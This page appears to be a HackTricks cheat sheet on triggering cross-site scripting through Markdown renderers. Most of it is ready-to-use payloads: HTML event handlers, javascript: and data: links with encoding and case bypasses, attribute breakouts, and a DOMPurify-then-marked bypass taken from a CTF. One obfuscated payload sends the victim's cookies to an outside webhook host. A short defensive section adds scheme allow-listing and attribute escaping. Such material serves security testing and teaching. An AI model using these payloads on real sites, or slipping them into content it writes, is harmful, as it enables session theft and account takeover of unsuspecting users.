# XSS in Markdown
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

If you have the chance to inject code in markdown, there are a few options you can use to trigger an XSS when the code gets interpreted.
### HTML tags
The most common way to get XSS in markdown is to inject common HTML tags that execute JavaScript, because several Markdown interpreters will also accept HTML:
```html
<!-- XSS with regular tags -->
<script>alert(1)</script>
<img src=x onerror=alert(1) />
```
You can find more examples in the [main XSS page of hacktricks](./).
### Javascript links
If HTML tags aren't an option, you can always try to play with Markdown syntax:
```html
<!-- Markdown link to XSS; this usually works but requires user interaction -->
[a](javascript:prompt(document.cookie))
<!-- Other link attacks with some bypasses -->
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
```
### Img event syntax abuse
```markdown
![Uh oh...]("onerror="alert('XSS'))
![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
```
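The link and image payloads in the two sections above only work when the renderer copies the destination into an attribute without checking its scheme or escaping it. As an added example (not HackTricks code and not taken from any Markdown library), this is one way a renderer hook could gate destinations with a scheme allow-list and escape the attribute value; `ALLOWED_SCHEMES` and `renderLink` are assumptions, and the check deliberately over-blocks.

```javascript
// Added example: allow-list check for Markdown link/image destinations,
// plus attribute escaping for the rendered tag.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]); // assumed policy

const fromCode = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\ufffd");

// Undo the encodings used by the bypasses above: %XX escapes and numeric HTML
// character references (with or without the trailing ';'). Used for the check only.
function decodeLayers(s) {
  for (let i = 0; i < 3; i++) {
    const next = s
      .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
      .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCode(parseInt(h, 16)))
      .replace(/&#([0-9]+);?/g, (_, d) => fromCode(parseInt(d, 10)))
      .replace(/&colon;/gi, ":");
    if (next === s) break;
    s = next;
  }
  return s;
}

// Returns true only for relative references and allow-listed schemes.
function isSafeHref(href) {
  // Drop whitespace and control characters that could hide a scheme name.
  const s = decodeLayers(String(href)).replace(/[\s\u0000-\u001f\u007f-\u009f]/g, "");
  // A ':' before any '/', '?' or '#' means the text in front of it is a scheme.
  const m = /^([^:/?#]*):/.exec(s);
  return m === null || ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Escape every character that could close the attribute or open a tag.
function escapeAttr(v) {
  return String(v).replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Hypothetical renderer hook: emits the <a> tag for one Markdown link.
function renderLink(text, href) {
  const target = isSafeHref(href) ? href : "#";
  return `<a href="${escapeAttr(target)}" rel="noopener">${escapeAttr(text)}</a>`;
}
```

The decoded string is used only for the decision; the original destination is what gets escaped and emitted, so legitimate URLs are not rewritten.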
### HTML Sanitiser Markdown Bypass
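The following code **sanitises the HTML input** first and only then **passes it to the Markdown parser**. XSS can be triggered by abusing the differences in how DOMPurify and the Markdown parser interpret the same text: DOMPurify approves the input as harmless HTML, and the Markdown parser then rewrites parts of it (for example text inside an attribute value) into new markup that is never sanitised. For the sanitiser to be effective it has to run on the parser's output, not on its input.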
```html
<!-- from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
<script>
  const qs = new URLSearchParams(location.search);
  if (qs.get("content")?.length > 0) {
    // Vulnerable order: the input is sanitised before marked rewrites it into new HTML
    document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
  }
</script>
```
Example payloads:
```html
<div id="1
![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
-----------------------------------------------
<a title="a
<img src=x onerror=alert(1)>">yep</a>
------------------------------------------------
[x](y '<style>')<!--</style><div id="x--><img src=1 onerror=alert(1)>"></div>
----------------------------------------------
[<p x='<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))> ](#'></p> )
----------------------------------------------
`<p x="`<img src=x onerror=alert(1)>"></p>
```
### Fuzzing
```html
<!--
Fuzzing examples from
- https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
- https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields
-->
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:alert('XSS'))
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain))
_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
< http: // \<meta \ http-equiv = \"refresh \"\ content= \"0; \ url=http://danlec.com/ \"\>>
[text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1))
[a](javascript:this;alert(1))
[a](javascript:this;alert(1))
[a](Javascript:alert(1))
[a](Javas%26%2399;ript:alert(1))
[a](javascript:alert(1))
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a ]( javascript:alert(document.domain) )
[a](javascript://www.google.com%0Aalert(1))
[a]('javascript:alert("1")')
[a](JaVaScRiPt:alert(1))
![a](https://www.google.com/image.png"onload="alert(1))
![a]("onerror="alert(1))
< /http://< ?php\>< \h1 \>< script:script > confirm(2)
[XSS](.alert(1);)
[ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]] )
[ ](http://a?p=[[/onclick=alert(0 ) .]])
[a](javascript:new%20Function`al\ert\`1\``;)
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](javascript:alert('XSS'))
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))
[XSS](javascript://%0d%0aprompt(1);com)
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](vbscript:alert(document.domain))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1))
[XSS](Javascript:alert(1))
[XSS](Javas%26%2399;ript:alert(1))
[XSS](javascript:alert(1))
[XSS](javascript:confirm(1)
[XSS](javascript://www.google.com%0Aprompt(1))
[XSS](javascript://%0d%0aconfirm(1);com)
[XSS](javascript:window.onerror=confirm;throw%201)
[XSS ](<EFBFBD> javascript:alert(document.domain) )
![XSS](javascript:prompt(document.cookie))\
![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
![XSS'"`onerror=prompt(document.cookie)](x)\
```